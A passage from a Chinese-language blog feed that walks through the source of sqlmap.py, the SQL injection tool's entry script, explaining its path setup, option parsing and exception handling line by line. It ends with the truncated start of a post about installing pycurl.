<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"></span><br><span class="line"><span class="string">"""</span><br><span class="line">Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)</span><br><span class="line">See the file 'doc/COPYING' for copying permission</span><br><span class="line">"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">sys.dont_write_bytecode = <span class="keyword">True</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> lib.utils <span class="keyword">import</span> versioncheck <span class="comment"># this has to be the first non-standard import</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> bdb</span><br><span class="line"><span class="keyword">import</span> inspect</span><br><span class="line"><span class="keyword">import</span> logging</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> shutil</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> thread</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> traceback</span><br><span class="line"><span class="keyword">import</span> warnings</span><br><span class="line"></span><br><span class="line">warnings.filterwarnings(action=<span class="string">"ignore"</span>, message=<span class="string">".*was already imported"</span>, category=UserWarning)</span><br><span class="line">warnings.filterwarnings(action=<span class="string">"ignore"</span>, category=DeprecationWarning)</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> lib.controller.controller <span class="keyword">import</span> start</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> banner</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> createGithubIssue</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> dataToStdout</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> getSafeExString</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> getUnicode</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> maskSensitiveData</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> setPaths</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> weAreFrozen</span><br><span class="line"><span class="keyword">from</span> lib.core.data <span class="keyword">import</span> cmdLineOptions</span><br><span class="line"><span class="keyword">from</span> lib.core.data <span class="keyword">import</span> conf</span><br><span class="line"><span class="keyword">from</span> lib.core.data <span class="keyword">import</span> kb</span><br><span class="line"><span class="keyword">from</span> lib.core.data <span class="keyword">import</span> logger</span><br><span class="line"><span class="keyword">from</span> lib.core.data <span class="keyword">import</span> paths</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> unhandledExceptionMessage</span><br><span class="line"><span class="keyword">from</span> lib.core.exception <span class="keyword">import</span> SqlmapBaseException</span><br><span class="line"><span class="keyword">from</span> lib.core.exception <span class="keyword">import</span> SqlmapShellQuitException</span><br><span class="line"><span class="keyword">from</span> lib.core.exception <span class="keyword">import</span> SqlmapSilentQuitException</span><br><span class="line"><span class="keyword">from</span> lib.core.exception <span class="keyword">import</span> SqlmapUserQuitException</span><br><span class="line"><span class="keyword">from</span> lib.core.option <span class="keyword">import</span> initOptions</span><br><span class="line"><span class="keyword">from</span> lib.core.option <span class="keyword">import</span> init</span><br><span class="line"><span class="keyword">from</span> lib.core.profiling <span class="keyword">import</span> profile</span><br><span class="line"><span class="keyword">from</span> lib.core.settings <span class="keyword">import</span> LEGAL_DISCLAIMER</span><br><span class="line"><span class="keyword">from</span> lib.core.testing <span class="keyword">import</span> smokeTest</span><br><span class="line"><span class="keyword">from</span> lib.core.testing <span class="keyword">import</span> liveTest</span><br><span class="line"><span class="keyword">from</span> lib.parse.cmdline <span class="keyword">import</span> cmdLineParser</span><br><span class="line"><span class="keyword">from</span> lib.utils.api <span class="keyword">import</span> setRestAPILog</span><br><span class="line"><span class="keyword">from</span> lib.utils.api <span class="keyword">import</span> StdDbOut</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">modulePath</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="string">"""</span><br><span class="line"> This will get us the program's directory, even if we are frozen</span><br><span class="line"> using py2exe</span><br><span class="line"> """</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> _ = sys.executable <span class="keyword">if</span> weAreFrozen() <span class="keyword">else</span> __file__</span><br><span class="line"> <span class="keyword">except</span> NameError:</span><br><span class="line"> _ = inspect.getsourcefile(modulePath)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding())</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="string">"""</span><br><span class="line"> Main function of sqlmap when running from command line.</span><br><span class="line"> """</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> paths.SQLMAP_ROOT_PATH = modulePath()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> os.path.isdir(paths.SQLMAP_ROOT_PATH)</span><br><span class="line"> <span class="keyword">except</span> UnicodeEncodeError:</span><br><span class="line"> errMsg = <span class="string">"your system does not properly handle non-ASCII paths. "</span></span><br><span class="line"> errMsg += <span class="string">"Please move the sqlmap's directory to the other location"</span></span><br><span class="line"> logger.error(errMsg)</span><br><span class="line"> <span class="keyword">raise</span> SystemExit</span><br><span class="line"></span><br><span class="line"> setPaths()</span><br><span class="line"> banner()</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Store original command line options for possible later restoration</span></span><br><span class="line"> cmdLineOptions.update(cmdLineParser().__dict__)</span><br><span class="line"> initOptions(cmdLineOptions)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> hasattr(conf, <span class="string">"api"</span>):</span><br><span class="line"> <span class="comment"># Overwrite system standard output and standard error to write</span></span><br><span class="line"> <span class="comment"># to an IPC database</span></span><br><span class="line"> sys.stdout = StdDbOut(conf.taskid, messagetype=<span class="string">"stdout"</span>)</span><br><span class="line"> sys.stderr = StdDbOut(conf.taskid, messagetype=<span class="string">"stderr"</span>)</span><br><span class="line"> setRestAPILog()</span><br><span class="line"></span><br><span class="line"> conf.showTime = <span class="keyword">True</span></span><br><span class="line"> dataToStdout(<span class="string">"[!] legal disclaimer: %s\n\n"</span> % LEGAL_DISCLAIMER, forceOutput=<span class="keyword">True</span>)</span><br><span class="line"> dataToStdout(<span class="string">"[*] starting at %s\n\n"</span> % time.strftime(<span class="string">"%X"</span>), forceOutput=<span class="keyword">True</span>)</span><br><span class="line"></span><br><span class="line"> init()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> conf.profile:</span><br><span class="line"> profile()</span><br><span class="line"> <span class="keyword">elif</span> conf.smokeTest:</span><br><span class="line"> smokeTest()</span><br><span class="line"> <span class="keyword">elif</span> conf.liveTest:</span><br><span class="line"> liveTest()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> start()</span><br><span class="line"> <span class="keyword">except</span> thread.error <span class="keyword">as</span> ex:</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"can't start new thread"</span> <span class="keyword">in</span> getSafeExString(ex):</span><br><span class="line"> errMsg = <span class="string">"unable to start new threads. Please check OS (u)limits"</span></span><br><span class="line"> logger.critical(errMsg)</span><br><span class="line"> <span class="keyword">raise</span> SystemExit</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">raise</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> SqlmapUserQuitException:</span><br><span class="line"> errMsg = <span class="string">"user quit"</span></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> logger.error(errMsg)</span><br><span class="line"> <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> (SqlmapSilentQuitException, bdb.BdbQuit):</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> SqlmapShellQuitException:</span><br><span class="line"> cmdLineOptions.sqlmapShell = <span class="keyword">False</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> SqlmapBaseException <span class="keyword">as</span> ex:</span><br><span class="line"> errMsg = getSafeExString(ex)</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> logger.critical(errMsg)</span><br><span class="line"> <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> <span class="keyword">raise</span> SystemExit</span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line"> <span class="keyword">print</span></span><br><span class="line"></span><br><span class="line"> errMsg = <span class="string">"user aborted"</span></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> logger.error(errMsg)</span><br><span class="line"> <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> EOFError:</span><br><span class="line"> <span class="keyword">print</span></span><br><span class="line"> errMsg = <span class="string">"exit"</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> logger.error(errMsg)</span><br><span class="line"> <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> SystemExit:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> <span class="keyword">print</span></span><br><span class="line"> errMsg = unhandledExceptionMessage()</span><br><span class="line"> excMsg = traceback.format_exc()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">if</span> any(_ <span class="keyword">in</span> excMsg <span class="keyword">for</span> _ <span class="keyword">in</span> (<span class="string">"No space left"</span>, <span class="string">"Disk quota exceeded"</span>)):</span><br><span class="line"> errMsg = <span class="string">"no space left on output device"</span></span><br><span class="line"> logger.error(errMsg)</span><br><span class="line"> <span class="keyword">raise</span> SystemExit</span><br><span class="line"></span><br><span class="line"> <span class="keyword">elif</span> <span class="string">"_mkstemp_inner"</span> <span class="keyword">in</span> excMsg:</span><br><span class="line"> errMsg = <span class="string">"there has been a problem while accessing temporary files"</span></span><br><span class="line"> logger.error(errMsg)</span><br><span class="line"> <span class="keyword">raise</span> SystemExit</span><br><span class="line"></span><br><span class="line"> <span class="keyword">elif</span> all(_ <span class="keyword">in</span> excMsg <span class="keyword">for</span> _ <span class="keyword">in</span> (<span class="string">"pymysql"</span>, <span class="string">"configparser"</span>)):</span><br><span class="line"> errMsg = <span class="string">"wrong initialization of pymsql detected (using Python3 dependencies)"</span></span><br><span class="line"> logger.error(errMsg)</span><br><span class="line"> <span class="keyword">raise</span> SystemExit</span><br><span class="line"></span><br><span class="line"> <span class="keyword">elif</span> <span class="string">"bad marshal data (unknown type code)"</span> <span class="keyword">in</span> excMsg:</span><br><span class="line"> match = re.search(<span class="string">r"\s*(.+)\s+ValueError"</span>, excMsg)</span><br><span class="line"> errMsg = <span class="string">"one of your .pyc files are corrupted%s"</span> % (<span class="string">" ('%s')"</span> % match.group(<span class="number">1</span>) <span class="keyword">if</span> match <span class="keyword">else</span> <span class="string">""</span>)</span><br><span class="line"> errMsg += <span class="string">". Please delete .pyc files on your system to fix the problem"</span></span><br><span class="line"> logger.error(errMsg)</span><br><span class="line"> <span class="keyword">raise</span> SystemExit</span><br><span class="line"></span><br><span class="line"> <span class="keyword">elif</span> <span class="string">"valueStack.pop"</span> <span class="keyword">in</span> excMsg <span class="keyword">and</span> kb.get(<span class="string">"dumpKeyboardInterrupt"</span>):</span><br><span class="line"> <span class="keyword">raise</span> SystemExit</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> match <span class="keyword">in</span> re.finditer(<span class="string">r'File "(.+?)", line'</span>, excMsg):</span><br><span class="line"> file_ = match.group(<span class="number">1</span>)</span><br><span class="line"> file_ = os.path.relpath(file_, os.path.dirname(__file__))</span><br><span class="line"> file_ = file_.replace(<span class="string">"\\"</span>, <span class="string">'/'</span>)</span><br><span class="line"> file_ = re.sub(<span class="string">r"\.\./"</span>, <span class="string">'/'</span>, file_).lstrip(<span class="string">'/'</span>)</span><br><span class="line"> excMsg = excMsg.replace(match.group(<span class="number">1</span>), file_)</span><br><span class="line"></span><br><span class="line"> errMsg = maskSensitiveData(errMsg)</span><br><span class="line"> excMsg = maskSensitiveData(excMsg)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> hasattr(conf, <span class="string">"api"</span>):</span><br><span class="line"> logger.critical(<span class="string">"%s\n%s"</span> % (errMsg, excMsg))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> logger.critical(errMsg)</span><br><span class="line"> kb.stickyLevel = logging.CRITICAL</span><br><span class="line"> dataToStdout(excMsg)</span><br><span class="line"> createGithubIssue(errMsg, excMsg)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">finally</span>:</span><br><span class="line"> kb.threadContinue = <span class="keyword">False</span></span><br><span class="line"> kb.threadException = <span class="keyword">True</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> conf.get(<span class="string">"showTime"</span>):</span><br><span class="line"> dataToStdout(<span class="string">"\n[*] shutting down at %s\n\n"</span> % time.strftime(<span class="string">"%X"</span>), forceOutput=<span class="keyword">True</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> kb.get(<span class="string">"tempDir"</span>):</span><br><span class="line"> shutil.rmtree(kb.tempDir, ignore_errors=<span class="keyword">True</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> conf.get(<span class="string">"hashDB"</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> conf.hashDB.flush(<span class="keyword">True</span>)</span><br><span class="line"> <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> cmdLineOptions.get(<span class="string">"sqlmapShell"</span>):</span><br><span class="line"> cmdLineOptions.clear()</span><br><span class="line"> conf.clear()</span><br><span class="line"> kb.clear()</span><br><span class="line"> main()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> hasattr(conf, <span class="string">"api"</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> conf.database_cursor.disconnect()</span><br><span class="line"> <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> conf.get(<span class="string">"dumper"</span>):</span><br><span class="line"> conf.dumper.flush()</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program</span></span><br><span class="line"> <span class="keyword">if</span> conf.get(<span class="string">"threads"</span>, <span class="number">0</span>) > <span class="number">1</span> <span class="keyword">or</span> conf.get(<span class="string">"dnsServer"</span>):</span><br><span class="line"> os._exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure>
<h3 id="modulePath()">modulePath()</h3><p>64-69行<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">try:</span><br><span class="line"> _ = sys<span class="class">.executable</span> <span class="keyword">if</span> <span class="function"><span class="title">weAreFrozen</span><span class="params">()</span></span> <span class="keyword">else</span> __file__</span><br><span class="line">except NameError:</span><br><span class="line"> _ = inspect.<span class="function"><span class="title">getsourcefile</span><span class="params">(modulePath)</span></span></span><br><span class="line"></span><br><span class="line">return <span class="function"><span class="title">getUnicode</span><span class="params">(os.path.dirname(os.path.realpath(_)</span></span>), encoding=sys.<span class="function"><span class="title">getfilesystemencoding</span><span class="params">()</span></span>)</span><br></pre></td></tr></table></figure></p>
<p><em>sys.executable</em><br>获取当前python解释器的路径<br><em>weAreFrozen()</em><br>见lib/core/common.py 1181-1188行<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">weAreFrozen</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="string">"""</span><br><span class="line"> Returns whether we are frozen via py2exe.</span><br><span class="line"> This will affect how we find out where we are located.</span><br><span class="line"> Reference: http://www.py2exe.org/index.cgi/WhereAmI</span><br><span class="line"> """</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> hasattr(sys, <span class="string">"frozen"</span>)</span><br></pre></td></tr></table></figure></p>
<p>hasattr用于确定一个对象是否具有某个属性。<br>语法:<br> hasattr(object, name) -> bool<br>判断sys中是否有frozen属性,返回一个布尔值</p>
<p><em>getUnicode</em><br>见lib/core/common.py 2155-2189<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getUnicode</span><span class="params">(value, encoding=None, noneToNull=False)</span>:</span></span><br><span class="line"> <span class="string">"""</span><br><span class="line"> Return the unicode representation of the supplied value:</span><br><span class="line"></span><br><span class="line"> >>> getUnicode(u'test')</span><br><span class="line"> u'test'</span><br><span class="line"> >>> getUnicode('test')</span><br><span class="line"> u'test'</span><br><span class="line"> >>> getUnicode(1)</span><br><span class="line"> u'1'</span><br><span class="line"> """</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> noneToNull <span class="keyword">and</span> value <span class="keyword">is</span> <span class="keyword">None</span>:</span><br><span class="line"> <span class="keyword">return</span> NULL</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> isListLike(value):</span><br><span class="line"> value = list(getUnicode(_, encoding, noneToNull) <span class="keyword">for</span> _ <span class="keyword">in</span> value)</span><br><span class="line"> <span class="keyword">return</span> value</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> isinstance(value, unicode):</span><br><span class="line"> <span class="keyword">return</span> value</span><br><span class="line"> <span class="keyword">elif</span> isinstance(value, basestring):</span><br><span class="line"> <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">return</span> unicode(value, encoding <span class="keyword">or</span> (kb.get(<span class="string">"pageEncoding"</span>) <span class="keyword">if</span> kb.get(<span class="string">"originalPage"</span>) <span class="keyword">else</span> <span class="keyword">None</span>) <span class="keyword">or</span> UNICODE_ENCODING)</span><br><span class="line"> <span class="keyword">except</span> UnicodeDecodeError, ex:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">return</span> unicode(value, UNICODE_ENCODING)</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> value = value[:ex.start] + <span class="string">""</span>.join(INVALID_UNICODE_CHAR_FORMAT % ord(_) <span class="keyword">for</span> _ <span class="keyword">in</span> value[ex.start:ex.end]) + value[ex.end:]</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">return</span> unicode(value)</span><br><span class="line"> <span class="keyword">except</span> UnicodeDecodeError:</span><br><span class="line"> <span class="keyword">return</span> unicode(str(value), errors=<span class="string">"ignore"</span>) <span class="comment"># encoding ignored for non-basestring instances</span></span><br></pre></td></tr></table></figure></p>
<p>得到一个unicode的值</p>
<p><em>sys.getfilesystemencoding()</em><br>获取文件使用的编码方式</p>
<p>所以这个modulePath 主要用于获得路径。</p>
<h3 id="main()">main()</h3><p>87行<em>setPaths()</em>见lib/core/common.py 1133-1179行<br>设置了sqlmap的绝对路径</p>
<p>88行<em>banner()</em>见lib/core/common.py 1079-1092行<br>打印了sqlmap的版本信息</p>
<p>91-92行<br>存储以备日后恢复原来的命令行选项<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cmdLineOptions.<span class="function"><span class="title">update</span><span class="params">(cmdLineParser()</span></span>.__dict__)</span><br><span class="line"><span class="function"><span class="title">initOptions</span><span class="params">(cmdLineOptions)</span></span></span><br></pre></td></tr></table></figure></p>
<p><em>initOptions(cmdLineOptions)</em><br>见lib/core/option.py 2533-2536行<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">initOptions</span><span class="params">(inputOptions=AttribDict<span class="params">()</span>, overrideOptions=False)</span>:</span></span><br><span class="line"> _setConfAttributes()</span><br><span class="line"> _setKnowledgeBaseAttributes()</span><br><span class="line"> _mergeOptions(inputOptions, overrideOptions)</span><br></pre></td></tr></table></figure></p>
<p><em>_setConfAttributes()</em><br>见lib/core/option.py 1739-1773行<br>设置了一些必要的属性<br><em>_setKnowledgeBaseAttributes()</em><br>见lib/core/option.py 1775-1938行<br>保存了一些注入时的参数,<br><em>_mergeOptions()</em><br>见lib/core/option.py 2131-2184行<br>利用配置文件和默认选项整理合并命令行</p>
<p>115行<em>start()</em><br>见lib/controller.py 247-677行<br>开始检测,这个函数之后我会再写一篇介绍。</p>
]]></content>
<summary type="html">
<![CDATA[<h2 id="sqlmap-py源码">sqlmap.py源码</h2>]]>
</summary>
<category term="sqlmap,python" scheme="http://edward-l.github.io/tags/sqlmap%EF%BC%8Cpython/"/>
<category term="sqlmap" scheme="http://edward-l.github.io/categories/sqlmap/"/>
</entry>
<entry>
<title><![CDATA[pycurl安装]]></title>
<link href="http://edward-l.github.io/2015/07/03/pycurl%E5%AE%89%E8%A3%85/"/>
<id>http://edward-l.github.io/2015/07/03/pycurl安装/</id>
<published>2015-07-03T05:30:16.000Z</published>
<updated>2015-07-03T06:09:26.000Z</updated>
<content type="html"><![CDATA[<p>昨晚在安装pycurl的时候遇到了点问题,记录下解决的方法。<br><a id="more"></a><br>首先尝试用<br><figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo pip <span class="keyword">install</span> pycurl</span><br></pre></td></tr></table></figure></p>
<p>出现了这样的错误<br><figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">error</span>: command 'cc' failed <span class="keyword">with</span> <span class="keyword">exit</span> status <span class="number">1</span></span><br></pre></td></tr></table></figure></p>
